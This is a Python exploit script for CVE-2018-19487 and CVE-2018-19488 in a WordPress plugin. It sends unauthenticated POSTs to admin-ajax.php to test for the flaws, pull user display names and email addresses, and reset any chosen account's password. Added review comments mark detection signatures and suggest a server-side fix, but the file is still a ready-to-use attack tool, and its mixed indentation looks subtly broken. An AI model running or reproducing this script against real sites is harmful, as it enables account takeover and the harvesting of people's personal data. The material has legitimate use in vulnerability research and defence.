###### CVE-2018-19487 exploit ######
###### CVE-2018-19488 exploit ######
###### Written by Anthony Maestre ######

import requests, urllib, re, sys, json


def checkenum():
        """Probe for CVE-2018-19487 (unauthenticated employer-profile lookup).

        The target base URL is taken from ``sys.argv[2]``.  A single
        ``cs_uid=1`` / ``action=cs_employer_ajax_profile`` form is POSTed to
        ``/wp-admin/admin-ajax.php`` without any session, and the target is
        reported as vulnerable solely on an HTTP 200 status.  The response
        body is never inspected, so the verdict is a coarse indicator only.
        """
	print 'Domaine: ' + sys.argv[2]
	check = urllib.urlencode({'cs_uid': 1, 'action': 'cs_employer_ajax_profile'})
        # Hard-coded desktop Chrome/39 User-Agent: a stable fingerprint of this
        # tool in web-server logs, alongside the unauthenticated admin-ajax POST.
        headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
        # verify=False disables TLS certificate validation for this request.
        res = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=check, headers=headers, verify=False)
        # NOTE(review): only the status code is tested; admin-ajax.php may
        # answer 200 for reasons unrelated to this action, so a positive
        # here should be treated as unconfirmed.
        if res.status_code == 200:
            print '\nVulnerable to users enumeration !'
        else:
            print '\nNOT Vulnerable to users enumeration.'
        

def checkreset():
        """Probe for CVE-2018-19488 (unauthenticated password reset).

        Sends an actual ``cs_reset_pass`` request -- empty ``user_login``,
        ``admin`` as the candidate password -- to ``/wp-admin/admin-ajax.php``
        and scans the returned HTML for ``<i class="...">`` icons.  An
        ``icon-warning4`` match together with HTTP 200 is taken as
        "vulnerable".  This is not a passive check: the request is a real
        reset attempt from the server's point of view.
        """
        print 'Domaine: ' + sys.argv[2]
        check2 = urllib.urlencode({'new_pass': 'admin', 'confirm_new_pass': 'admin', 'user_login': "", 'action': 'cs_reset_pass'})
        # Same hard-coded User-Agent as the other functions; usable as a
        # detection signature for this tool.
        headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
        # verify=False disables TLS certificate validation for this request.
        data = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=check2, headers=headers, verify=False)

        res = re.findall(r'<i class=\"(.*?)\"',str(data.content))
        # NOTE(review): one verdict line is printed per icon match, so a
        # single response can print both messages, and a response with no
        # <i class="..."> element prints nothing at all.
        for i in res:
            if i == str('icon-warning4') and data.status_code == 200:
                print '\nVulnerable to password reset !'
            else:
                print '\nNOT vulnerable to password reset.'


def enum():
	"""Enumerate users through CVE-2018-19487.

	For ``cs_uid`` 0..4 a ``cs_employer_ajax_profile`` form is POSTed to
	``/wp-admin/admin-ajax.php`` and the ``display_name`` and ``user_email``
	input values are regex-extracted from the returned HTML; every
	login/email pairing found is printed.  A burst of sequential ``cs_uid``
	values from one client is the corresponding log signature.
	"""
	print 'Domaine: ' + sys.argv[2]
	for i in range(5):
		# Local name shadows the enclosing function; harmless here because
		# enum() is never re-entered from inside the loop.
		enum = urllib.urlencode({'cs_uid': i, 'action': 'cs_employer_ajax_profile'})
		headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
		# verify=False disables TLS certificate validation for this request.
         	data = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=enum, headers=headers, verify=False)

		login = re.findall(r'name="display_name" value=\"(.*?)\"',str(data.content))
		mail = re.findall(r'name="user_email" value=\"(.*?)\"',str(data.content))
		# Nested loops print the cross product of all matches, not a
		# positional pairing.
		for user in login:
			for address in mail:
				print "uid " + str(i) +" : " + user + "  " + address


def reset():
        """Reset an account password through CVE-2018-19488.

        Prompts on stdin for the target login and the new password, then
        POSTs them as ``user_login`` / ``new_pass`` / ``confirm_new_pass``
        with ``action=cs_reset_pass`` to ``/wp-admin/admin-ajax.php``.  An
        ``icon-checkmark6`` match in the HTML together with HTTP 200 is
        reported as success.  Presumably the server-side handler applies the
        reset without verifying the requester's identity; on the defending
        side the fix is authentication/ownership checks (and a nonce) on
        that AJAX action -- TODO confirm against the plugin source.
        """
        print 'Domaine: ' + sys.argv[2]
        login = raw_input("User: ")
        pw = raw_input('New password: ')
        reset = urllib.urlencode({'new_pass': pw, 'confirm_new_pass': pw, 'user_login': login, 'action': 'cs_reset_pass'})
        # Same hard-coded User-Agent as the other functions; usable as a
        # detection signature for this tool.
        headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
        # verify=False disables TLS certificate validation for this request.
        data = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=reset, headers=headers, verify=False)

        res = re.findall(r'<i class=\"(.*?)\"',str(data.content))
        # NOTE(review): one verdict line is printed per icon match, so a
        # single response can print both messages, and a response with no
        # <i class="..."> element prints nothing at all.
        for i in res:
            if i == str('icon-checkmark6') and data.status_code == 200:
                print '\nPassword successfully reset ! =)'
            else:
                print '\nError ! Cannot reset password.'



# CLI dispatch.  Exactly two arguments are expected (a mode flag and the base
# URL); any other argument count, or ``--help`` as the flag, prints the usage
# text.  The combined ``< 3 or > 3`` test is simply ``len(sys.argv) != 3``.
# A flag that matches none of the branches below (with the right argument
# count) prints nothing.
if len(sys.argv) < 3 or len(sys.argv) > 3 or sys.argv[1] == "--help":
    print '\n--checkenum [http(s)://domain] to test if vulnerable to users enumeration'
    print '\n--checkreset [http(s)://domain] to test if vulnerable to password reset'
    print '\n--enum [http(s)://domain] to enum users'
    print '\n--reset [http(s)://domain] to reset user password\n' 

elif sys.argv[1] == "--checkenum":
    checkenum()

elif sys.argv[1] == "--checkreset":
    checkreset()

elif sys.argv[1] == "--enum":
    enum()

elif sys.argv[1] == "--reset":
    reset()